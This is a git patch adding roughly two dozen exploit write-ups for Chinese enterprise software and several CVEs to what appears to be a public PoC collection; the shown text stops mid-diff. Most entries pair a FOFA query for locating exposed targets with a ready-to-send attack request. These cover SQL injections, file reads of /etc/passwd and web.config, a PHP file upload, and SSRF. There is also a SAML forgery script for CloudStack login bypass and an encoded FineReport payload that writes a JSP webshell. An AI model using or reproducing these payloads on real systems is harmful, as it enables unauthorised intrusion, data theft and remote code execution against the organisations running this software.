From ea7c5d1062004012039db203995533b8439b820a Mon Sep 17 00:00:00 2001 From: wy876 Date: Wed, 24 Jul 2024 21:44:16 +0800 Subject: [PATCH] =?UTF-8?q?724=E6=9B=B4=E6=96=B0=E6=BC=8F=E6=B4=9E?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...ack中的SAML身份验证漏洞(CVE-2024-41107).md | 89 +++++++++ Bazarr任意文件读取(CVE-2024-40348).md | 16 ++ README.md | 28 ++- WVP视频平台(国标28181)未授权SQL注入漏洞.md | 21 ++ 创客13星零售商城系统前台任意文件上传漏洞.md | 43 +++++ ...物流getOrderTrackingNumber存在sql注入漏洞.md | 23 +++ 华磊科技物流modifyInsurance存在sql注入漏洞.md | 23 +++ 启明星辰天玥网络安全审计系统SQL注入漏洞.md | 25 +++ ...系统AreaAvatarDownLoad.aspx任意文件读取漏洞.md | 22 +++ 帆软系统ReportServer存在SQL注入漏洞导致RCE.md | 40 ++++ ...管理系统BusinessManger.ashx存在SQL注入漏洞.md | 22 +++ ...工程管理系统desktop.ashx存在SQL注入漏洞.md | 21 ++ ....md => 明源云ERP接口ApiUpdate.ashx文件上传漏洞.md | 3 +- ...bile系统接口installOperate.do存在SSRF漏洞.md | 23 +++ ...kPlanService前台SQL注入漏洞(XVE-2024-18112).md | 40 ++++ ...bizintegrationwebservice.asmx存在命令执行漏洞.md | 33 ++++ ...dataSphereServlet接口存在任意文件读取漏洞.md | 31 +++ ...ygoodsgridbycode接口code参数存在SQL注入漏洞.md | 24 +++ ...理系统dormitoryHealthRanking存在SQL注入漏洞.md | 21 ++ ...卡通管理系统get_kq_tj_today存在SQL注入漏洞.md | 21 ++ ...安渡系统接口queryLinklnfo存在SQL注入漏洞.md | 20 ++ 致远OA系统constDef接口存在代码执行漏洞.md | 180 ++++++++++++++++++ ...fileup.php前台文件上传漏洞(XVE-2024-18154).md | 27 +++ ...星CMSV6车载视频监控平台disable存在SQL注入.md | 24 +++ ...026G-P交换机WEB管理ping.htm未授权访问漏洞.md | 10 + ...云MyImportData前台SQL注入(XVE-2024-18113).md | 9 + 26 files changed, 836 insertions(+), 3 deletions(-) create mode 100644 Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107).md create mode 100644 Bazarr任意文件读取(CVE-2024-40348).md create mode 100644 WVP视频平台(国标28181)未授权SQL注入漏洞.md create mode 100644 创客13星零售商城系统前台任意文件上传漏洞.md create mode 100644 华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md create mode 100644 华磊科技物流modifyInsurance存在sql注入漏洞.md create mode 100644 启明星辰天玥网络安全审计系统SQL注入漏洞.md create mode 100644 天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取漏洞.md create mode 100644 帆软系统ReportServer存在SQL注入漏洞导致RCE.md create mode 100644 建文工程管理系统BusinessManger.ashx存在SQL注入漏洞.md create mode 100644 建文工程管理系统desktop.ashx存在SQL注入漏洞.md rename 明源云 ERP ApiUpdate.ashx 文件上传漏洞.md => 明源云ERP接口ApiUpdate.ashx文件上传漏洞.md (95%) create mode 100644 泛微E-Mobile系统接口installOperate.do存在SSRF漏洞.md create mode 100644 泛微e-cology9接口WorkPlanService前台SQL注入漏洞(XVE-2024-18112).md create mode 100644 浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞.md create mode 100644 润乾报表dataSphereServlet接口存在任意文件读取漏洞.md create mode 100644 用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞.md create mode 100644 科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞.md create mode 100644 科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞.md create mode 100644 联软安渡系统接口queryLinklnfo存在SQL注入漏洞.md create mode 100644 致远OA系统constDef接口存在代码执行漏洞.md create mode 100644 资管云comfileup.php前台文件上传漏洞(XVE-2024-18154).md create mode 100644 通天星CMSV6车载视频监控平台disable存在SQL注入.md create mode 100644 锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞.md create mode 100644 飞讯云MyImportData前台SQL注入(XVE-2024-18113).md diff --git a/Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107).md b/Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107).md new file mode 100644 index 0000000..f8f4f48 --- /dev/null +++ b/Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107).md @@ -0,0 +1,89 @@ +# Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107) + +Apache软件基金会发布了一则关于其开源云计算平台Apache CloudStack的严重漏洞(CVE-2024-41107)的安全公告。此漏洞影响安全断言标记语言(SAML)认证机制,可能允许攻击者绕过认证,获得对用户账户和资源的未授权访问。 + +## poc + +```python +import requests +from bs4 import BeautifulSoup +from datetime import datetime, timedelta +import xml.etree.ElementTree as ET +import base64 +import logging + +# Setup logging +logging.basicConfig(filename='exploit.log', level=logging.INFO, format='%(asctime)s - %(message)s') + +# URL of the login endpoint +url = "http://target-cloudstack-instance.com/client/api" + +# Function to generate dynamic SAML response +def generate_saml_response(username): + issue_instant = datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ') + not_on_or_after = (datetime.utcnow() + timedelta(hours=1)).strftime('%Y-%m-%dT%H:%M:%SZ') + + saml_response = f""" + + http://your-saml-issuer.com + + + + + http://your-saml-issuer.com + + {username} + + + + + + + {url} + + + + + urn:oasis:names:tc:SAML:2.0:ac:classes:PasswordProtectedTransport + + + + + """ + return base64.b64encode(saml_response.encode('utf-8')).decode('utf-8') + +# List of usernames to attempt access +usernames = ["user1@example.com", "user2@example.com", "admin@example.com"] + +# Function to attempt login with SAML response +def attempt_login(saml_response): + data = { + "command": "samlSsoLogin", + "SAMLResponse": saml_response + } + response = requests.post(url, data=data) + + if response.status_code == 200: + soup = BeautifulSoup(response.text, 'html.parser') + session_id = soup.find('sessionid') + if session_id: + logging.info(f"Login successful, session ID: {session_id.text}") + print(f"Login successful, session ID: {session_id.text}") + else: + logging.info("Login failed, no session ID found in response.") + print("Login failed, no session ID found in response.") + else: + logging.info(f"Login failed, status code: {response.status_code}") + print(f"Login failed, status code: {response.status_code}") + +# Attempt login for each username +for username in usernames: + saml_response = generate_saml_response(username) + attempt_login(saml_response) +``` + + + +## 漏洞来源 + +- https://github.com/d0rb/CVE-2024-41107/blob/main/PoC.py \ No newline at end of file diff --git a/Bazarr任意文件读取(CVE-2024-40348).md b/Bazarr任意文件读取(CVE-2024-40348).md new file mode 100644 index 0000000..cc5ea2c --- /dev/null +++ b/Bazarr任意文件读取(CVE-2024-40348).md @@ -0,0 +1,16 @@ +# Bazarr任意文件读取(CVE-2024-40348) + +Bazaar v1.4.3 的组件 /api/swaggerui/static 中存在一个问题,允许未经身份验证的攻击者执行目录遍历。 + +## poc + +```yaml +/api/swaggerui/static/../../../../../../../../../../../../../../../../etc/passwd +``` + + + +## 漏洞来源 + +- https://www.seebug.org/vuldb/ssvid-99863 +- https://github.com/4rdr/proofs/blob/main/info/Bazaar_1.4.3_File_Traversal_via_Filename.md \ No newline at end of file diff --git a/README.md b/README.md index d2ba6d1..8fdc30e 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,31 @@ # 漏洞收集 -收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了700多个poc/exp,善用CTRL+F搜索 +收集整理漏洞EXP/POC,大部分漏洞来源网络,目前收集整理了800多个poc/exp,善用CTRL+F搜索 + +## 2024.07.24 新增漏洞 + +- 通天星CMSV6车载视频监控平台disable存在SQL注入 +- 创客13星零售商城系统前台任意文件上传漏洞 +- 建文工程管理系统BusinessManger.ashx存在SQL注入漏洞 +- 天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取漏洞 +- 致远OA系统constDef接口存在代码执行漏洞 +- 启明星辰天玥网络安全审计系统SQL注入漏洞 +- Bazarr任意文件读取(CVE-2024-40348) +- 浪潮云财务系统bizintegrationwebservice.asmx存在命令执行漏洞 +- 建文工程管理系统desktop.ashx存在SQL注入漏洞 +- 帆软系统ReportServer存在SQL注入漏洞导致RCE +- WVP视频平台(国标28181)未授权SQL注入漏洞 +- 用友NC系统querygoodsgridbycode接口code参数存在SQL注入漏洞 +- 锐捷RG-NBS2026G-P交换机WEB管理ping.htm未授权访问漏洞 +- 华磊科技物流modifyInsurance存在sql注入漏洞 +- 华磊科技物流getOrderTrackingNumber存在sql注入漏洞 +- 泛微E-Mobile系统接口installOperate.do存在SSRF漏洞 +- 润乾报表dataSphereServlet接口存在任意文件读取漏洞 +- 联软安渡系统接口queryLinklnfo存在SQL注入漏洞 +- 科讯一卡通管理系统get_kq_tj_today存在SQL注入漏洞 +- 科讯一卡通管理系统dormitoryHealthRanking存在SQL注入漏洞 +- Apache-CloudStack中的SAML身份验证漏洞(CVE-2024-41107) +- 飞讯云MyImportData前台SQL注入(XVE-2024-18113) +- 资管云comfileup.php前台文件上传漏洞(XVE-2024-18154) ## 2024.07.20 新增漏洞 diff --git a/WVP视频平台(国标28181)未授权SQL注入漏洞.md b/WVP视频平台(国标28181)未授权SQL注入漏洞.md new file mode 100644 index 0000000..148ea85 --- /dev/null +++ b/WVP视频平台(国标28181)未授权SQL注入漏洞.md @@ -0,0 +1,21 @@ +# WVP视频平台(国标28181)未授权SQL注入漏洞 + +WVP视频平台(国标28181)未授权接口/api/push/list存在SQL注入漏洞 + +## fofa + +```yaml +body="国标28181" +``` + +## poc + +``` +GET /api/push/list?page=1&count=15&query=1'&pushing=&mediaServerId= HTTP/1.1 +Host: +Accept-Encoding: gzip, deflate, br +Accept: */* +Connection: close +``` + +![image-20240723184213670](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407231842730.png) \ No newline at end of file diff --git a/创客13星零售商城系统前台任意文件上传漏洞.md b/创客13星零售商城系统前台任意文件上传漏洞.md new file mode 100644 index 0000000..a2b2554 --- /dev/null +++ b/创客13星零售商城系统前台任意文件上传漏洞.md @@ -0,0 +1,43 @@ +# 创客13星零售商城系统前台任意文件上传漏洞 + +创客13星零售商城系统前台任意文件上传漏洞 + +## fofa + +```yaml +"/Public/Xin/static/css/iconfont.css" +``` + +## poc + +```yaml +POST /Login/shangchuan HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br, zstd +Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7 +Cache-Control: max-age=0 +Connection: keep-alive +Content-Length: 197 +Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBP56KuZOdlY4nLGg +Host: 127.0.0.1 +Origin: http://127.0.0.1 +Referer: http://127.0.0.1/Login/shangchuan +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +sec-ch-ua: "Not/A)Brand";v="8", "Chromium";v="126", "Google Chrome";v="126" +sec-ch-ua-mobile: ?0 +sec-ch-ua-platform: "Windows" +sec-fetch-user: ?1 + +------WebKitFormBoundary03rNBzFMIytvpWhy +Content-Disposition: form-data; name="file"; filename="1.php" +Content-Type: image/jpeg + + +------WebKitFormBoundary03rNBzFMIytvpWhy-- +``` + +![图片](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407211609279.webp) \ No newline at end of file diff --git a/华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md b/华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md new file mode 100644 index 0000000..a09a2ab --- /dev/null +++ b/华磊科技物流getOrderTrackingNumber存在sql注入漏洞.md @@ -0,0 +1,23 @@ +# 华磊科技物流getOrderTrackingNumber存在sql注入漏洞 + +华磊科技物流系统 getOrderTrackingNumber.htm等接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```yaml + body="l_c_bar"||body="l_c_center" +``` + +## poc + +```yaml +GET /getOrderTrackingNumber.htm?documentCode=1'and%0a1=user::integer-- HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +``` + +![124f279b89f8424f958930e6abe3022f.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407232011946.png) \ No newline at end of file diff --git a/华磊科技物流modifyInsurance存在sql注入漏洞.md b/华磊科技物流modifyInsurance存在sql注入漏洞.md new file mode 100644 index 0000000..baff4e4 --- /dev/null +++ b/华磊科技物流modifyInsurance存在sql注入漏洞.md @@ -0,0 +1,23 @@ +# 华磊科技物流modifyInsurance存在sql注入漏洞 + +华磊科技物流系统 modifyInsurance.htm等接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。 + +## fofa + +```yaml +body="l_c_bar"||body="l_c_center" +``` + +## poc + +```yaml +GET /modifyInsurance.htm?documentCode=1&insuranceValue=1&customerId=1+AND+6269=(SELECT+6269+FROM+PG_SLEEP(5)) HTTP/1.1 +Host: your-ip +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:125.0) Gecko/20100101 Firefox/125.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: close +``` + +![9b6950da9ffc45e699c4df8ebcdeae21.png](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407232010044.png) \ No newline at end of file diff --git a/启明星辰天玥网络安全审计系统SQL注入漏洞.md b/启明星辰天玥网络安全审计系统SQL注入漏洞.md new file mode 100644 index 0000000..c822a2f --- /dev/null +++ b/启明星辰天玥网络安全审计系统SQL注入漏洞.md @@ -0,0 +1,25 @@ +# 启明星辰天玥网络安全审计系统SQL注入漏洞 + +## fofa + +```yaml +app="启明星辰-天玥网络安全审计" +``` + +## poc + +```yaml +POST /ops/index.php?c=Reportguide&a=checkrn HTTP/1.1 +Host xxx +User-Agent: Mozilla/5.0(Macintosh;Intel Mac OS X 10.15;rv:88.0) Gecko/20100101 Firefox/88.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3en;q=0.2 +Accept-Encoding: gzip,deflate +Upgrade-Insecure-Requests: 1 +Connection: close +Content-Type: application/x-www-from-urlencoded +Content-Length: 23 + +checkname=123&tagid=123* +``` + diff --git a/天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取漏洞.md b/天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取漏洞.md new file mode 100644 index 0000000..021e8a7 --- /dev/null +++ b/天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取漏洞.md @@ -0,0 +1,22 @@ +# 天问物业ERP系统AreaAvatarDownLoad.aspx任意文件读取漏洞 + +天问物业ERP系统` /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx `接口处存在任意文件读取漏洞,未经身份验证的攻击者可以利用此漏洞读取系统内部配置文件,造成信息泄露,导致系统处于极不安全的状态。 + +## fofa + +```yaml +body="天问物业ERP系统" || body="国家版权局软著登字第1205328号" || body="/HM/M_Main/frame/sso.aspx" +``` + +## poc + +```yaml +GET /HM/M_Main/InformationManage/AreaAvatarDownLoad.aspx?AreaAvatar=../web.config HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407222335701.png) \ No newline at end of file diff --git a/帆软系统ReportServer存在SQL注入漏洞导致RCE.md b/帆软系统ReportServer存在SQL注入漏洞导致RCE.md new file mode 100644 index 0000000..7990043 --- /dev/null +++ b/帆软系统ReportServer存在SQL注入漏洞导致RCE.md @@ -0,0 +1,40 @@ +# 帆软系统ReportServer存在SQL注入漏洞导致RCE + +帆软工具软件存在RCE +访问URL:/webroot/decision/view/ReportServer?test=&n=,可执行GET参数n中的SQL语句,该漏洞是由于帆软自带的sqlite-jdbc-x.x.x.x.jar驱动导致。影响范围:FineReport和FineBI所有版本产品。HW爆出的day,没有复现 + +## fofa + +```yaml +body="isSupportForgetPwd" +``` + +## poc + +```java +GET /webroot/decision/view/ReportServer?test=&n=${sum(1024,1)} +HTTP/1.1 +Host: 192.168.174.152:8075 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0)Gecko/20100101 Firefox/128.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language:zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Connection: close +Referer:http://192.168.174.152:8075/webroot/decision/login?origin=1dc5fbd4-27eb-41b5-a43f-0623003685b4 +Cookie: tenantId=default +``` + +```yaml +GET /webroot/decision/view/ReportServer?test=ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssss&n=${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%61%74%74%61%63%68%0C%64%61%74%61%62%61%73%65%20%27%2F%68%6F%6D%65%2F%46%44%4C%2F%74%6F%6D%63%61%74%2D%6C%69%6E%75%78%2F%77%65%62%61%70%70%73%2F%77%65%62%72%6F%6F%74%2F%68%65%6C%70%2F%74%31%36%32%36%35%39%34%2E%6A%73%70%27%20%61%73%20%27%74%31%36%32%36%35%39%34%27%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%63%72%65%61%74%65%0C%74%61%62%6C%65%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%20%74%65%78%74%29%3B'),1,1)}${__fr_locale__=sql('FRDemo',DECODE('%ef%bb%bf%49%4E%53%45%52%54%0C%69%6E%74%6F%20%74%31%36%32%36%35%39%34%2E%74%74%28%64%61%74%61%7A%29%20%56%41%4C%55%45%53%20%28%27%3C%25%43%6C%61%73%73%20%73%61%66%65%20%3D%20%43%6C%61%73%73%2E%66%6F%72%4E%61%6D%65%28%22%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%22%29%3B%6A%61%76%61%2E%6C%61%6E%67%2E%72%65%66%6C%65%63%74%2E%46%69%65%6C%64%20%73%61%66%65%43%6F%6E%20%3D%20%73%61%66%65%2E%67%65%74%44%65%63%6C%61%72%65%64%46%69%65%6C%64%28%22%74%68%65%55%6E%22%20%2B%20%22%73%61%66%65%22%29%3B%73%61%66%65%43%6F%6E%2E%73%65%74%41%63%63%65%73%73%69%62%6C%65%28%74%72%75%65%29%3B%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%20%75%6E%53%61%66%65%20%3D%20%28%73%75%6E%2E%6D%69%73%63%2E%55%6E%73%61%66%65%29%20%73%61%66%65%43%6F%6E%2E%67%65%74%28%6E%75%6C%6C%29%3B%62%79%74%65%5B%5D%20%64%61%74%61%42%79%74%65%73%20%3D%20%6A%61%76%61%78%2E%78%6D%6C%2E%62%69%6E%64%2E%44%61%74%61%74%79%70%65%43%6F%6E%76%65%72%74%65%72%2E%70%61%72%73%65%42%61%73%65%36%34%42%69%6E%61%72%79%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%64%61%74%61%22%29%29%3B%75%6E%53%61%66%65%2E%64%65%66%69%6E%65%41%6E%6F%6E%79%6D%6F%75%73%43%6C%61%73%73%28%6A%61%76%61%2E%69%6F%2E%46%69%6C%65%2E%63%6C%61%73%73%2C%20%64%61%74%61%42%79%74%65%73%2C%20%6E%75%6C%6C%29%2E%6E%65%77%49%6E%73%74%61%6E%63%65%28%29%3B%25%3E%27%29%3B'),1,1)} HTTP/1.1 +host: xxxx +connection: close +content-type: application/x-www-form-urlencoded +x-forwarded-for: xxxx +accept-encoding: gzip, deflate +user-agent: python-requests/2.31.0 +accept: */* +``` + +![image-20240724214141086](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407242141177.png) + diff --git a/建文工程管理系统BusinessManger.ashx存在SQL注入漏洞.md b/建文工程管理系统BusinessManger.ashx存在SQL注入漏洞.md new file mode 100644 index 0000000..d701d2f --- /dev/null +++ b/建文工程管理系统BusinessManger.ashx存在SQL注入漏洞.md @@ -0,0 +1,22 @@ +# 建文工程管理系统BusinessManger.ashx存在SQL注入漏洞 + +建文工程管理系统 `/AppInterface/Business/BusinessManger.ashx `存在SQL注入漏洞。 + +## fofa + +```yaml +body="Login/QRLogin.ashx" +``` + +![image-20240722163029952](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407221630031.png) + +## poc + +```yaml +POST /AppInterface/Business/BusinessManger.ashx HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + +method=PrjType&content=%' and 1=2 union select 1,(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','233')),3,32));-- a +``` \ No newline at end of file diff --git a/建文工程管理系统desktop.ashx存在SQL注入漏洞.md b/建文工程管理系统desktop.ashx存在SQL注入漏洞.md new file mode 100644 index 0000000..3555b2b --- /dev/null +++ b/建文工程管理系统desktop.ashx存在SQL注入漏洞.md @@ -0,0 +1,21 @@ +# 建文工程管理系统desktop.ashx存在SQL注入漏洞 + +建文工程管理系统`/SysFrame4/Desktop.ashx` 存在SQL注入漏洞 + +## fofa + +```yaml +body="Login/QRLogin.ashx" +``` + +## poc + +```yaml +POST /SysFrame4/Desktop.ashx HTTP/1.1 +Host: +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15 + +account=1'+and+%01(select+SUBSTRING(sys.fn_sqlvarbasetostr(HASHBYTES('MD5','233')),3,32))<0--&method=isChangePwd&pwd= +``` + diff --git a/明源云 ERP ApiUpdate.ashx 文件上传漏洞.md b/明源云ERP接口ApiUpdate.ashx文件上传漏洞.md similarity index 95% rename from 明源云 ERP ApiUpdate.ashx 文件上传漏洞.md rename to 明源云ERP接口ApiUpdate.ashx文件上传漏洞.md index 279a437..52cc2e9 100644 --- a/明源云 ERP ApiUpdate.ashx 文件上传漏洞.md +++ b/明源云ERP接口ApiUpdate.ashx文件上传漏洞.md @@ -1,4 +1,4 @@ -## 明源云 ERP ApiUpdate.ashx 文件上传漏洞 +## 明源云ERP接口ApiUpdate.ashx文件上传漏洞 ``` POST /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a HTTP/1.1 Host: target.com @@ -9,5 +9,4 @@ Content-Length: 856 